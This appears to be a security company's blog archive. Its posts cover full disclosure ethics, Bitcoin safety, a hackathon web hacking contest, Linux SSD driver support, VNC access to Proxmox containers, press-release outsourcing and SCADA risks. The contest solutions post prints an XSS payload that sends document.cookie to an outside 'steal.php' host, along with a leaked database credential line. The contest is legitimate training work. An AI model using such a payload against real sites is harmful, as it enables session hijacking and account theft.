Security Research

Security researchers servants of a morbid system

Yesterday I was reading an article based on a Microsoft report titled “Security researchers exploiting vulnerabilities“.

For me, somebody who born in the security and hacking scene, it’s total nonsense. The community has been, finally, destroyed by a short sighted security market around five years ago in the five years before.

Underground is dead, hackers were saying. As in an Andersen tale.

The fact is that nowadays exploit development gone underground or in the direction of paid bounties and “intelligence” exploit packs, eg: in the money direction.

Since not every hacker or researcher want to play this sick and ethic-less game (see the disappearance of the Full Disclosure mailing-list for instance) less vulnerabilities are researched and disclosed pro-bono, and if you want to access that knowledge you need extensive financial resources.

What is the result?

Vendor, big intelligence agglomerates and security corporations can tell people that they did a great job in securing the world while the truth is exactly the opposite. High impact vulnerabilities are now a bargaining chip and will not be disclosed publicly in a timely manner.

For who believed in the Full Disclosure paradigm this is the last lost battle of a lost war.

Full Disclosure is part of a real Responsible Disclosure process, notify the vendor and force him to fix the issue fast as it will be available to the public soon, and let the people know the risk they are or were exposed to. Or feel free, also form an ethical point of view, to disclose the issue directly. This allowed independent security researchers to get the credit they deserved while guaranteeing transparency, naturally really little money was involved.

With the current model of vulnerability trading the researcher loses any control on the disclosure process, that could not happen at all.

It’s easy to speculate, seen the facts that are emerging every day (NSA, artificial crypto-weakness, cyber-intelligence and offense), that information gathered for a fraction of it’s value is now retained for an indefinite amount of time to allow it’s exclusive access and use by a number of well known actors.

Call me idealistic but this maturity model smells of control.

Information is not free anymore.

–Francesco Ongaro
https://twitter.com/isgroupsrl

Standard
ISGroup

Reply to David Orban: Creatività, passione e innovazione in Finanza, Banche e Diritto

Thanks David for your lecture. It’s a very interesting set of considerations for somebody who, like me, has a background that doesn’t overlap with the subjects of macro-economics and global finance. Listening your words I can feel the ethics and vision that entail your enthusiasm on the topic.

Regarding the micro-economic and daily use of Bitcoin I see a big problem connected to the safety of John Doe’s savings, and I don’t know how that could be addressed with the currect technical implementation.

The issue is the lack of insurance. In the past we build a protection mechanism where bigger institutions, directed by the corpus iuris, guaranteed and protected your money deposit from some type of threats. This happen with bank accounts under one hundred thousand euros in Italy against a bank crack. This happen with hijacked credit card transactions to maintain an high customer trust in the system itself, an important surveillance and revenue stream in nowadays economy. This happen thanks to insurance policies if your property get destroyed.

Our current money can be simply reprinted or recreated or adjusted in case of a faulty banking IT system.

With Bitcoins or any crypto-currency the safety of the deposit is all on the shoulders of the wallet owner, that must be connected to inherently vulnerable systems like personal computers, notebooks and smart-phones.

We have already seen large-scale attacks against wallets and most of computer trojans now include a bitcoin wallet stealing functionality alongside the old web banking ones. Exchangers themselves have been hacked and have an amateur level of computer security and general hijack resiliency.

Additionally if a user lose the private key or the wallet itself there is no way to recreate that coins.

How can a deflationary, fixed-size-pool, uninsured, global currency like Bitcoin work on the long term? Theoretically, over time, all the created coins could vanish in vapor :)

— Francesco Ongaro

Standard
ISGroup

Giacomo Rizzi, Web Security Challenge Winner, H-BANK

H-FARM supercharged the challenge with an amazing prize: an iPad Retina Mini! The contest consisted in three simple web pages to be hacked using the most common web security attack vectors: an XSS, a SQL Injection and a Local File Disclosure.

Giacomo Rizzi demonstrated to be a developer aware of security issues, a paramount ability for a developer. Who would drive a car engineered to be super-fast but absolutely insecure?

car

Here’s Giacomo with the H-FARM sponsored prize!

image (1)

Thanks again H-FARM for raising the security awareness level of tomorrow’s developers.

Standard
ISGroup

H-BANK Outcome: H-BANK Web Security Challenge (#2)

Interested in the challenge source code and solutions? Download the PDF!

ISGroup-HBANK-Challenge

Solutions provided by Giacomo Rizzi, the winner of the contest:

Challenge 1: H-FARM</textarea><script> (new Image()).src=”http://10.1.2.172/steal.php?cookies=”+document.cookie;</script><!–

Challenge 2: UGOTMEMADHAXOR!

Challenge 3: $link = mysql_connect(‘127.0.0.1’, ‘hackmehard’, ‘Psvm6bPywNQsaMNR’);

Standard
ISGroup

H-BANK Outcome: ISGroup SRL @ H-Farm Ventures 8-9 February 2014 (#1)

Venerdi 8 e sabato 9 ISGroup ha partecipato ad H-BANK, un’iniziativa organizzata da H-Farm Ventures presso la sede di Roncade (Treviso).

hfarm

H-Farm organizza, con cadenza quasi mensile, eventi dinamici e pieni di giovani sviluppatori, designer, presenti e futuri imprenditori. Questo trend positivo ha avuto inizio con HackItaly, a cui abbiamo partecipato creando un progetto ludico chiamato KittensRevenge in collaborazione con un team di validi sviluppatori capitanati da Valter Franchetti. Per darvi un’idea dell’ambiente creativo negli stessi due giorni abbiamo scritto Sniffing the innocent (HackItaly outcome #2) e Aruba networks log parser (HackItaly outcome #1). Lo scopo della presente competizione era partecipare a dei brief creativi di tre banche (Unicredit, IFIS, Intesa San Paolo) realizzando applicazioni e siti web in grado di soddisfare le richieste del cliente.

8TkVKD9d

Il nostro (Francesco Ongaro, Gianluca Pericoli) apporto alla competizione è consistito nell’offrire supporto sulle problematiche di security. Gli sviluppatori dei vari team, nel contesto della maratona di due giorni, potevano porre qualsiasi tipo di domanda sul security design della loro applicazione (“i mattoni che stiamo mettendo assieme hanno un senso dal punto di vista della sicurezza?”) e sull’implementazione sicura di funzionalità specifiche (“questa riga di codice introduce problemi di sicurezza?”).

Inoltre è stato piacevole discutere delle possibili carriere nel nostro settore e dare una panoramica su quello che il mercato richiede, sia per quanto riguarda lo skill-set che le certificazioni professionali che “tirano”.

La sicurezza è il settore in cui operiamo e speriamo che le sfide intellettuali quotidiane di cui si compone il lavoro di un security researcher attirino presto molte giovani menti. A questo proposito vi segnaliamo la possibilità di effettuare degli stage presso la nostra azienda, contattateci!

Partecipando ad H-Farm potete contare sulla disponibilità e sull’esperienza di due grandi persone, Riccardo Donadon e Maurizio Rossi, che non solo sono genuinamente interessati all’innovazione apportata da ogni partecipante, ma offrono, in un periodo economicamente non semplice, un opportunità concreta di crescita per giovani imprenditori.

hackmehard

A tarda notte con la preziosa collaborazione di Marco Pistolesi, ICT Manager di H-Farm, abbiamo organizzato un Web Hacking Contest (simpaticamente chiamato “hack me hard”) che metteva a disposizione 3 pagine affette da 3 diverse vulnerabilità. Lo scopo era, nella migliore tradizione dei contest di sicurezza offensiva, di identificare le vulnerabilità e sfruttarle. Il vincitore della competizione è stato Giacomo Rizzi, uno sviluppatore 19enne che assieme ai compagni di classe ha fornito più velocemente la soluzione.

H-ACK BANK è un esempio di aggregazione di competenze, sviluppo di idee, oltre che un’organizzazione in grado di supportare una maratona con più di 400 partecipanti su più giorni.

O più semplicemente una piacevole opportunità per passare un week-end in un ambiente rilassato :)

Standard
Security Research

OCZ RevoDrive 3 and OCZ RevoDrive 3 X2 PCIe SSD support for Linux 2.6

Support for OCZ RevoDrive3, RevoDrive3 X2, zDrive R4 in Proxmox (and vanilla 2.6 kernel sources) is possible thanks to the work of robbat2 and geneanon. This repository contains all the information needed to patch your kernel and backport RevoDrive support in the stable 2.6.32 Proxmox kernel (The only one with OpenVZ support at the time of writing, Gen 2014).

https://github.com/isgroup-srl/ocz-revodrive-2.6-proxmox

Standard
Security Research

Proxmox 2.6.32 support for OCZ RevoDrive3, RevoDrive3 X2, zDrive R4

Please sustain the request for better PCI Express SSD support in the stable version of Proxmox VE: post a comment on https://github.com/proxmox/pve-kernel-2.6.32/issues/1 and contact the maintainers!

Dear Proxmox kernel mantainers,

OCZ is providing a terrible Linux support, in an attempt to “protect” the technology of their VCA chip, build on a Marvell 88SE9485 controller. Basically they try to push down the adoption of RevoDrive3 and RevoDrive3 X2 on Linux machines in favor of other “enterprise” class products (zDrive R4). All summed, this attitude will grant lifetime exclusion from the kernel and painful user experience.

In reality the device just works with minor modifications of the mvsas driver [1]. Modifications that are already included in the mainline 3.2 kernel [2].

Additionally it seems, according to the report of b3rlin3r, that VCA actually decrease performance compared to the standard Marvell device [4]. Vanilla mvsas driver does 4612 TPs VS 3605 TPs for the OCZ VCA driver (actually 2, oczpcie and oczvca).

My request is to backport the robbat2 patch to the rhel6-2.6.32 [3] kernel, it’s just a matter of adding some PCI ids to the driver.

Thanks and have a great day,
Francesco ascii Ongaro
http://www.ush.it/ – http://www.isgroup.biz/

[1] http://www.ocztechnologyforum.com/forum/showthread.php?95151-Linux-patch-support-for-RevoDrive3-RevoDrive3-X2-zDrive-R4&p=686288&viewfull=1

[2] http://cateee.net/lkddb/web-lkddb/SCSI_MVSAS.html

[3] http://download.openvz.org/kernel/branches/rhel6-2.6.32/stable/

[4] http://www.ocztechnologyforum.com/forum/showthread.php?98087-OCZ-RevoDrive-3-X2-Linux-driver-AVAILABLE&p=715784&viewfull=1#post715784

Thanks,
Francesco `ascii` Ongaro
http://www.easyaudit.org

Standard
Security Research

Connecting to Proxmox VE OpenVZ containers using VNC

Proxmox VE has an administrative panel that allows connecting to KVM and OpenVZ virtual machines using a Java applet and the VNC protocol (RFB). The issue is that Java is a show-stopper for me, it’s unsafe, bloated and barely runs as a browser plugin. A lot of Proxmox users complain about this part of the implementation, and try to find alternative ways to directly connect to the virtual VGA adapter of their machines.

Seen the amount of VNC implementations that use modern HTML5, WebSockets and Canvas this seems a really poor choice to me. Proxmox’s devs if you are listening please implement this!

While it’s possible to directly “enter” in an OpenVZ container by issuing a “vzctl” command, this would require a shell access on the server node:

vzctl enter 101

There are many reasons that would make you prefer a VNC access to the guest machine, one for all avoid giving access to the host node to a sysadmin or a customer.

For KVM there are solution available (manually editing the KVM configuration of the virtual machine to enable the VNC server) but for OpenVZ I wasn’t able to find a decent solution.

As in Xen a component called “vncterm” is used to connect to OpenVZ, or any other interactive command. Internally it uses X11VNC (http://www.karlrunge.com/x11vnc/x11vnc_opts.html).

The main issue was that the VNC server was offering a security type unsupported to most VNC clients (the infamous “Server did not offer supported security type” error).

$ vncviewer localhost::6900
Connected to RFB server, using protocol version 3.8
Server did not offer supported security type

Luckily vncterm allows passing arguments to x11vnc, by usign a mix of such arguments we can re-enable a standard, password based,  unencrypted VNC server that works with most clients. The command is like the following (please change the “test” password to a stronger one!):

ssh -L 6901:localhost:6901 root@pve-node 'vncterm -nossl -nopw -vencrypt never -passwd test -rfbport 6901 -listen localhost -localhost -timeout 20 -c vzctl enter 101'

It creates an SSH TCP tunnel between the localhost:6901 port on the server to the localhost:6901 port on the client (the sysadmin notebook, for example). Then the admin will be able to connect using a standard vncviewer client:

vncviewer localhost::6901

This will work without the annoying VNC security type error and can be easily tweaked to work from inetd/xinetd or stunnel if you need encryption.

For me it was a complete life saver!

Francesco `ascii` Ongaro
https://linkedin.com/in/ongaro

Standard
ISGroup

Press Release distribution analysis

Paying for distribution. Is it worth it? Here at ISGroup we have some daily SEO and Social Media tasks concurring with Penetration Testing and Ethical Hacking sessions. Nowadays any sane company do some Media/PR/Communication in-house, right? And while we are in no way experts sometimes we perform better than “real” Media companies, at last from a technical prospective. Our advantage is that we can code BASH (LOL!) and measure results. You can do amazing automation with just CURL wrapped by some logic, and the hacking mindset apply perfectly to Content/SEO/Social automation. Still there are professionals and companies who sell plain Ifttt and HootSuite to customers.

When it comes to Press Release distribution we generally outsource it. One can easily use Odesk and Fiverr to find contractors, after all they should be better specialized and more efficient than us.

If we will keep this method or not is still under discussion, seen the low results we are getting lately. For example a month ago I personally bought a gig from http://fiverr.com/cyberstorm/submit-your-press-release-to-50-top-pr-sites for a side project I’m expanding with Gianluca (not something we earn money from).

This is the Gig description was great:

MANUAL Press Submissions to USA BASED MEDIA. You can gain a wide audience for your site news with 50+ Top P.R website and some free Press Release Distribution sites. USE the PR & Search benefits of the online media with a service that gets results & saves your time & Make Money . PLEASE READ. All press releases must include your contact info at the bottom of the press release. Now you can add one IMAGE & VIDEO with ORDER. Gig Extras 50 more PR site $5 each , you can get up to 300 pr site $30 or 6 gigs.For 600 pr websites $50 or 10 gigs. PLEASE Make sure your press release is well written. Spelling and Grammar will not be checked. ( Press Release is submitted AS IS) I can help you promote your Start up, news business/company, Mobile Apps , kickstarter, indiegogo or any crowdfunding.

With an astonishing budget of 45$ the promise is the publication on more than 300 sities. Ideal for our Press Release about ScadaExposure (http://www.scadaexposure.com/)! The reality was pretty different:

The Results of the campaign are:

  • Published on 109 unique domains, for a total of 131 post;
  • Half of them are not working (not resolving, the ones with “investor” in the subdomain);
  • Only 9 pass a link to our target URL;
  • 8 of them are PR0 sities, like socialjunki.com;
  • 1 PR1 link from prnation.org;
  • The prnation.org service is worth 5$.

In conclusion one can archive better results without the need of outsourcing a Press Release distribution, just use the right free resources and buy the right services from the beginning!

Note to self, many PR resources are free or very affordable:

  • http://comunicatinocost.x10.mx/ [Free, ITA]
  • http://launch.it/ [Free]
  • http://new.pitchengine.com/ [Free(1 Article)+Pay] From $39/Article
  • http://pressreleaser.org/ [Free but not accepting new members]
  • http://prnation.org/ [Pay] From $5/Article
  • https://aap.com.au
  • http://www.1888pressrelease.com/ [Free+Pay] From $15/Article
  • http://www.24-7pressrelease.com/ [Pay] From $49/Article
  • http://www.clickpress.com/ [Pay] From $75/Article
  • http://www.freepressindex.com/
  • http://www.free-press-release.com/
  • http://www.i-newswire.com/
  • http://www.marketpressrelease.com/
  • http://www.mediasyndicate.com/
  • http://www.newswiretoday.com/ [Free+Pay] From $99/Month
  • http://www.onlineprnews.com/ [Free+Pay] From $22/Article
  • http://www.openpr.com/ [Free]
  • http://www.pr.com/ [Free+Pay] From $199/Year
  • http://www.pressreleasecircle.com/ [Pay] From $15/Article
  • http://www.prleap.com/ [Free+Pay] From $79/Article
  • http://www.prlog.org/ [Free]
  • http://www.prnewswire.com/ [Pay] $195/Year
  • http://www.prweb.com/ [Free+Pay] From $99/Article
  • http://www.przoom.com/ [Same people of newswiretoday.com]
  • http://www.realwire.com/ [Pay] From £125/Article
  • http://www.sbwire.com/ [Pay] From $20/Article
  • http://www.scoop.it/ [Free]
  • http://www.vdsys.com/ [???]

 

 

It would be nice to measure the performance level of each service!

Standard
Security Community

Situation in Switzerland and Internationally

Extract from Federal Strategy Unit for IT FSUIT; Federal Intelligence Service FIS; Reporting and Analysis Centre for Information Assurance MELANI www.melani.admin.ch.

Since the Stuxnet worm became known in the second half of 2010, there has been an increased focus on the security of SCADA software. The basic difficulty with SCADA systems lies especially in their history: originally, they were sealed-off, independent, and proprietary systems, 24 granting external access at most to the manufacturer for maintenance purposes via a dial-up modem.

Accordingly, these systems hardly ever have functions to protect them from electronic attacks. Recently, programmable logic controllers and process control technology have become increasingly networked, increasingly use standardised protocols and technologies, and are even sometimes reachable via the Internet. Using a special computer search engine (in contrast to website search engines such as Google, Bing etc.), it has become significantly easier to find such devices.

The media presence of Stuxnet apparently awakened the interest in industrial control technology and SCADA systems among many security experts as well. Since then, various vulnerabilities in such products have been found and reported on. Methods have been discovered allowing systems to be taken over remotely, to download or upload any kind of file, to shoot down specific services or controllers, 29 to infiltrate and launch code, and to simply inject false data to which the controllers then react as if they were correct.

The big difference compared with traditional computer software is that manufacturers so far have little experience in resolving vulnerabilities, and that the software of the components is only rarely updated by the operators. In the case of continuously running processes, this can only be done during specific maintenance windows. The effects of patches on the overall process may often be tested only to a very limited extent in advance. The principle “don’t touch a running system” entails that failures and breakdowns may quickly give rise to high costs.

SCADA systems are increasingly often connected with the administration systems of companies in order to make business decisions on the basis of real-time data, and data are increasingly exchanged via the Internet. Advocating the strict separation of operational and administrative systems is probably a good idea, but is likely illusory and impractical. Instead, the associated new dangers and risks must be identified, assessed, and strategies for identification and repair in the event of an incident must be developed. However, there are various measures for avoiding interference: e.g. by using a VPN for remote access, a firewall with white listing, and signing of the control code and configuration.

Standard